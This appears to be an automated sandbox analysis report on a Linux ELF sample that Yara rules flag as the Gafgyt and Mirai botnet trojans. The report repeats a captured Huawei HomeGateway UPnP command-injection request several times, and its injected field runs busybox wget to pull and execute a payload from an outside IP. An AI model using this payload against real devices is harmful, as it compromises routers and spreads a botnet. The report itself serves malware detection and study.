          Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 457Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 36 2e 32 32 34 2e 32 34 2e 32 34 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 156.224.24.249 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
          Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 457Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 36 2e 32 32 34 2e 32 34 2e 32 34 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 156.224.24.249 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
          Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 457Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 36 2e 32 32 34 2e 32 34 2e 32 34 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 156.224.24.249 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
          Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 457Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 36 2e 32 32 34 2e 32 34 2e 32 34 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 156.224.24.249 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
          Source: unknownNetwork traffic detected: HTTP traffic on port 43928 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 42836 -> 443
          Source: unknownTCP traffic detected without corresponding DNS query: 144.90.217.179
          Source: unknownTCP traffic detected without corresponding DNS query: 157.112.230.44
          Source: unknownTCP traffic detected without corresponding DNS query: 197.142.207.141
          Source: unknownTCP traffic detected without corresponding DNS query: 67.109.118.174
          Source: unknownTCP traffic detected without corresponding DNS query: 103.160.243.179
          Source: unknownTCP traffic detected without corresponding DNS query: 197.222.71.55
          Source: unknownTCP traffic detected without corresponding DNS query: 39.64.117.198
          Source: unknownTCP traffic detected without corresponding DNS query: 197.166.195.205
          Source: unknownTCP traffic detected without corresponding DNS query: 197.34.26.9
          Source: unknownTCP traffic detected without corresponding DNS query: 157.207.137.67
          Source: unknownTCP traffic detected without corresponding DNS query: 197.173.85.160
          Source: unknownTCP traffic detected without corresponding DNS query: 70.231.0.9
          Source: unknownTCP traffic detected without corresponding DNS query: 41.27.218.47
          Source: unknownTCP traffic detected without corresponding DNS query: 41.32.137.247
          Source: unknownTCP traffic detected without corresponding DNS query: 197.215.173.184
          Source: unknownTCP traffic detected without corresponding DNS query: 197.108.11.134
          Source: unknownTCP traffic detected without corresponding DNS query: 41.69.16.9
          Source: unknownTCP traffic detected without corresponding DNS query: 5.15.36.119
          Source: unknownTCP traffic detected without corresponding DNS query: 197.241.208.156
          Source: unknownTCP traffic detected without corresponding DNS query: 197.57.255.174
          Source: unknownTCP traffic detected without corresponding DNS query: 173.172.132.189
          Source: unknownTCP traffic detected without corresponding DNS query: 41.182.44.99
          Source: unknownTCP traffic detected without corresponding DNS query: 197.177.93.120
          Source: unknownTCP traffic detected without corresponding DNS query: 197.147.30.202
          Source: unknownTCP traffic detected without corresponding DNS query: 41.5.39.212
          Source: unknownTCP traffic detected without corresponding DNS query: 157.65.123.117
          Source: unknownTCP traffic detected without corresponding DNS query: 41.119.158.126
          Source: unknownTCP traffic detected without corresponding DNS query: 197.170.42.194
          Source: unknownTCP traffic detected without corresponding DNS query: 103.48.114.211
          Source: unknownTCP traffic detected without corresponding DNS query: 197.200.253.17
          Source: unknownTCP traffic detected without corresponding DNS query: 197.170.121.255
          Source: unknownTCP traffic detected without corresponding DNS query: 41.18.158.79
          Source: unknownTCP traffic detected without corresponding DNS query: 157.106.252.145
          Source: unknownTCP traffic detected without corresponding DNS query: 157.58.97.155
          Source: unknownTCP traffic detected without corresponding DNS query: 157.146.31.195
          Source: unknownTCP traffic detected without corresponding DNS query: 41.211.68.219
          Source: unknownTCP traffic detected without corresponding DNS query: 178.214.93.6
          Source: unknownTCP traffic detected without corresponding DNS query: 41.67.60.43
          Source: unknownTCP traffic detected without corresponding DNS query: 157.0.255.68
          Source: unknownTCP traffic detected without corresponding DNS query: 167.194.236.105
          Source: unknownTCP traffic detected without corresponding DNS query: 197.189.169.227
          Source: unknownTCP traffic detected without corresponding DNS query: 41.113.133.3
          Source: unknownTCP traffic detected without corresponding DNS query: 41.102.87.136
          Source: unknownTCP traffic detected without corresponding DNS query: 41.174.146.52
          Source: unknownTCP traffic detected without corresponding DNS query: 41.193.18.209
          Source: unknownTCP traffic detected without corresponding DNS query: 197.36.114.209
          Source: unknownTCP traffic detected without corresponding DNS query: 197.30.69.157
          Source: unknownTCP traffic detected without corresponding DNS query: 41.165.196.7
          Source: unknownTCP traffic detected without corresponding DNS query: 157.3.145.169
          Source: unknownTCP traffic detected without corresponding DNS query: 197.136.75.4
          Source: OMnylKuNNF.elfString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
          Source: OMnylKuNNF.elfString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
          Source: unknownHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 457Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 36 2e 32 32 34 2e 32 34 2e 32 34 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 156.224.24.249 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
          Source: unknownDNS traffic detected: queries for: j.xnyidc.top

          System Summary

          barindex
          Malicious sample detected (through community Yara rule)
          Source: OMnylKuNNF.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
          Source: OMnylKuNNF.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_9e9530a7 Author: unknown
          Source: OMnylKuNNF.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_807911a2 Author: unknown
          Source: OMnylKuNNF.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_d4227dbf Author: unknown
          Source: OMnylKuNNF.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_d996d335 Author: unknown
          Source: OMnylKuNNF.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_620087b9 Author: unknown
          Source: OMnylKuNNF.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_0cd591cd Author: unknown
          Source: OMnylKuNNF.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_33b4111a Author: unknown
          Source: OMnylKuNNF.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_a33a8363 Author: unknown
          Source: OMnylKuNNF.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_1e0c5ce0 Author: unknown
          Source: OMnylKuNNF.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_520deeb8 Author: unknown
          Source: OMnylKuNNF.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_6a77af0f Author: unknown
          Source: OMnylKuNNF.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_01e4a728 Author: unknown
          Source: OMnylKuNNF.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_e0cf29e2 Author: unknown
          Source: 6227.1.0000000000400000.000000000040f000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
          Source: 6227.1.0000000000400000.000000000040f000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_9e9530a7 Author: unknown
          Source: 6227.1.0000000000400000.000000000040f000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_807911a2 Author: unknown
          Source: 6227.1.0000000000400000.000000000040f000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_d4227dbf Author: unknown
          Source: 6227.1.0000000000400000.000000000040f000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_d996d335 Author: unknown
          Source: 6227.1.0000000000400000.000000000040f000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_620087b9 Author: unknown
          Source: 6227.1.0000000000400000.000000000040f000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_0cd591cd Author: unknown
          Source: 6227.1.0000000000400000.000000000040f000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_33b4111a Author: unknown
          Source: 6227.1.0000000000400000.000000000040f000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_a33a8363 Author: unknown
          Source: 6227.1.0000000000400000.000000000040f000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_1e0c5ce0 Author: unknown
          Source: 6227.1.0000000000400000.000000000040f000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_520deeb8 Author: unknown
          Source: 6227.1.0000000000400000.000000000040f000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_6a77af0f Author: unknown
          Source: 6227.1.0000000000400000.000000000040f000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_01e4a728 Author: unknown
          Source: 6227.1.0000000000400000.000000000040f000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_e0cf29e2 Author: unknown
          Source: Process Memory Space: OMnylKuNNF.elf PID: 6227, type: MEMORYSTRMatched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
          Source: OMnylKuNNF.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
          Source: OMnylKuNNF.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_9e9530a7 reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = d6ad6512051e87c8c35dc168d82edd071b122d026dce21d39b9782b3d6a01e50, id = 9e9530a7-ad4d-4a44-b764-437b7621052f, last_modified = 2021-09-16
          Source: OMnylKuNNF.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_807911a2 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = f409037091b7372f5a42bbe437316bd11c655e7a5fe1fcf83d1981cb5c4a389f, id = 807911a2-f6ec-4e65-924f-61cb065dafc6, last_modified = 2021-09-16
          Source: OMnylKuNNF.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_d4227dbf reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 58c4b1d4d167876b64cfa10f609911a80284180e4db093917fea16fae8ccd4e3, id = d4227dbf-6ab4-4637-a6ba-0e604acaafb4, last_modified = 2021-09-16
          Source: OMnylKuNNF.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_d996d335 reference_sample = b511eacd4b44744c8cf82d1b4a9bc6f1022fe6be7c5d17356b171f727ddc6eda, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = e9ccb8412f32187c309b0e9afcc3a6da21ad2f1ffa251c27f9f720ccb284e3ac, id = d996d335-e049-4052-bf36-6cd07c911a8b, last_modified = 2021-09-16
          Source: OMnylKuNNF.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_620087b9 reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 06cd7e6eb62352ec2ccb9ed48e58c0583c02fefd137cd048d053ab30b5330307, id = 620087b9-c87d-4752-89e8-ca1c16486b28, last_modified = 2021-09-16
          Source: OMnylKuNNF.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_0cd591cd os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 96c4ff70729ddb981adafd8c8277649a88a87e380d2f321dff53f0741675fb1b, id = 0cd591cd-c348-4c3a-a895-2063cf892cda, last_modified = 2021-09-16
          Source: OMnylKuNNF.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_33b4111a reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 9c3b63b9a0f54006bae12abcefdb518904a85f78be573f0780f0a265b12d2d6e, id = 33b4111a-e59e-48db-9d74-34ca44fcd9f5, last_modified = 2021-09-16
          Source: OMnylKuNNF.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_a33a8363 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 74f964eaadbf8f30d40cdec40b603c5141135d2e658e7ce217d0d6c62e18dd08, id = a33a8363-5511-4fe1-a0d8-75156b9ccfc7, last_modified = 2021-09-16
          Source: OMnylKuNNF.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_1e0c5ce0 reference_sample = 5b1f95840caebf9721bf318126be27085ec08cf7881ec64a884211a934351c2d, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 8e45538b59f9c9b8bc49661069044900c8199e487714c715c1b1f970fd528e3b, id = 1e0c5ce0-3b76-4da4-8bed-2e5036b6ce79, last_modified = 2021-09-16
          Source: OMnylKuNNF.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_520deeb8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = f4dfd1d76e07ff875eedfe0ef4f861bee1e4d8e66d68385f602f29cc35e30cca, id = 520deeb8-cbc0-4225-8d23-adba5e040471, last_modified = 2021-09-16
          Source: OMnylKuNNF.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_6a77af0f os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 4e436f509e7e732e3d0326bcbdde555bba0653213ddf31b43cfdfbe16abb0016, id = 6a77af0f-31fa-4793-82aa-10b065ba1ec0, last_modified = 2021-09-16
          Source: OMnylKuNNF.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_01e4a728 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = d90477364982bdc6cd22079c245d866454475749f762620273091f2fab73c196, id = 01e4a728-7c1c-479b-aed0-cb76d64dbb02, last_modified = 2021-09-16
